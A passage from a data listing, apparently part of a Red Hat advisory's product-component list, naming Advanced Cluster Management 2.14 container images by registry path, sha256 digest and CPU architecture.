"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
